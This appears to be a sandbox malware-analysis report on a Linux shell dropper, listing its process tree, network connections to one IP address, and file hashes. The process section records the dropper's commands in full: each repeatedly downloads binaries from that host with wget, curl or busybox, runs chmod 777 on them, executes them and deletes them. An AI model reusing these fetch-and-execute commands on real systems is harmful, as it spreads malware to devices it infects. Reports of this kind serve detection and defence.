File opened for modification /tmp/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m /usr/bin/curl N/A
File opened for modification /tmp/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp /usr/bin/curl N/A
File opened for modification /tmp/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj /usr/bin/curl N/A
File opened for modification /tmp/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA /usr/bin/curl N/A
File opened for modification /tmp/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj /usr/bin/curl N/A
File opened for modification /tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67 /usr/bin/curl N/A
File opened for modification /tmp/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz /usr/bin/curl N/A

Processes

/tmp/9269b23681aa621799bf65d165337d63101804bfb715857b2d462a891fc14c2b.sh

[/tmp/9269b23681aa621799bf65d165337d63101804bfb715857b2d462a891fc14c2b.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.126.196/bins/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA]

/bin/chmod

[chmod 777 RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA]

/tmp/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA

[./RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA]

/bin/rm

[rm RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA]

/usr/bin/wget

[wget http://87.120.126.196/bins/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz]

/bin/chmod

[chmod 777 zunJs37CUY2h9nRreComkTdOAsAvGJSgPz]

/tmp/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz

[./zunJs37CUY2h9nRreComkTdOAsAvGJSgPz]

/bin/rm

[rm zunJs37CUY2h9nRreComkTdOAsAvGJSgPz]

/usr/bin/wget

[wget http://87.120.126.196/bins/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb]

/bin/chmod

[chmod 777 OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb]

/tmp/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb

[./OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb]

/bin/rm

[rm OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb]

/usr/bin/wget

[wget http://87.120.126.196/bins/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S]

/bin/chmod

[chmod 777 Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S]

/tmp/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S

[./Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S]

/bin/rm

[rm Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S]

/usr/bin/wget

[wget http://87.120.126.196/bins/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly]

/bin/chmod

[chmod 777 pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly]

/tmp/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly

[./pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly]

/bin/rm

[rm pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly]

/usr/bin/wget

[wget http://87.120.126.196/bins/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m]

/bin/chmod

[chmod 777 2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m]

/tmp/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m

[./2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m]

/bin/rm

[rm 2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m]

/usr/bin/wget

[wget http://87.120.126.196/bins/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp]

/bin/chmod

[chmod 777 Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp]

/tmp/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp

[./Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp]

/bin/rm

[rm Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp]

/usr/bin/wget

[wget http://87.120.126.196/bins/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ]

/bin/chmod

[chmod 777 I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ]

/tmp/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ

[./I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ]

/bin/rm

[rm I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ]

/usr/bin/wget

[wget http://87.120.126.196/bins/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq]

/bin/chmod

[chmod 777 zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq]

/tmp/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq

[./zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq]

/bin/rm

[rm zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq]

/usr/bin/wget

[wget http://87.120.126.196/bins/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N]

/bin/chmod

[chmod 777 h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N]

/tmp/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N

[./h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N]

/bin/rm

[rm h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N]

/usr/bin/wget

[wget http://87.120.126.196/bins/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj]

/bin/chmod

[chmod 777 tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj]

/tmp/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj

[./tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj]

/bin/rm

[rm tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj]

/usr/bin/wget

[wget http://87.120.126.196/bins/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp]

/bin/chmod

[chmod 777 nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp]

/tmp/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp

[./nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp]

/bin/rm

[rm nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp]

/usr/bin/wget

[wget http://87.120.126.196/bins/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67]

/bin/chmod

[chmod 777 271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67]

/tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67

[./271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67]

/bin/rm

[rm 271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67]

/usr/bin/wget

[wget http://87.120.126.196/bins/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT]

/bin/chmod

[chmod 777 xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT]

/tmp/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT

[./xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT]

/bin/rm

[rm xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT]

/usr/bin/wget

[wget http://87.120.126.196/bins/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly]

/bin/chmod

[chmod 777 pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly]

/tmp/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly

[./pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly]

/bin/rm

[rm pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly]

/usr/bin/wget

[wget http://87.120.126.196/bins/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m]

/bin/chmod

[chmod 777 2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m]

/tmp/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m

[./2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m]

/bin/rm

[rm 2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m]

/usr/bin/wget

[wget http://87.120.126.196/bins/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67]

/bin/chmod

[chmod 777 271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67]

/tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67

[./271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67]

/bin/rm

[rm 271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67]

/usr/bin/wget

[wget http://87.120.126.196/bins/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT]

/bin/chmod

[chmod 777 xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT]

/tmp/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT

[./xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT]

/bin/rm

[rm xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT]

/usr/bin/wget

[wget http://87.120.126.196/bins/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp]

/bin/chmod

[chmod 777 Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp]

/tmp/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp

[./Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp]

/bin/rm

[rm Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp]

/usr/bin/wget

[wget http://87.120.126.196/bins/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ]

/bin/chmod

[chmod 777 I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ]

/tmp/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ

[./I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ]

/bin/rm

[rm I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ]

/usr/bin/wget

[wget http://87.120.126.196/bins/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq]

/bin/chmod

[chmod 777 zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq]

/tmp/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq

[./zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq]

/bin/rm

[rm zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq]

/usr/bin/wget

[wget http://87.120.126.196/bins/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N]

/bin/chmod

[chmod 777 h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N]

/tmp/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N

[./h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N]

/bin/rm

[rm h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N]

/usr/bin/wget

[wget http://87.120.126.196/bins/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj]

/bin/chmod

[chmod 777 tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj]

/tmp/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj

[./tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj]

/bin/rm

[rm tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj]

/usr/bin/wget

[wget http://87.120.126.196/bins/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp]

/bin/chmod

[chmod 777 nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp]

/tmp/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp

[./nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp]

/bin/rm

[rm nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp]

/usr/bin/wget

[wget http://87.120.126.196/bins/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S]

/bin/chmod

[chmod 777 Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S]

/tmp/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S

[./Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S]

/bin/rm

[rm Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S]

/usr/bin/wget

[wget http://87.120.126.196/bins/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA]

/bin/chmod

[chmod 777 RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA]

/tmp/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA

[./RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA]

/bin/rm

[rm RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA]

/usr/bin/wget

[wget http://87.120.126.196/bins/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz]

/bin/chmod

[chmod 777 zunJs37CUY2h9nRreComkTdOAsAvGJSgPz]

/tmp/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz

[./zunJs37CUY2h9nRreComkTdOAsAvGJSgPz]

/bin/rm

[rm zunJs37CUY2h9nRreComkTdOAsAvGJSgPz]

/usr/bin/wget

[wget http://87.120.126.196/bins/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb]

/bin/chmod

[chmod 777 OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb]

/tmp/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb

[./OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb]

/bin/rm

[rm OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb]

Network

Country Destination Domain Proto
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp

Files

/tmp/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97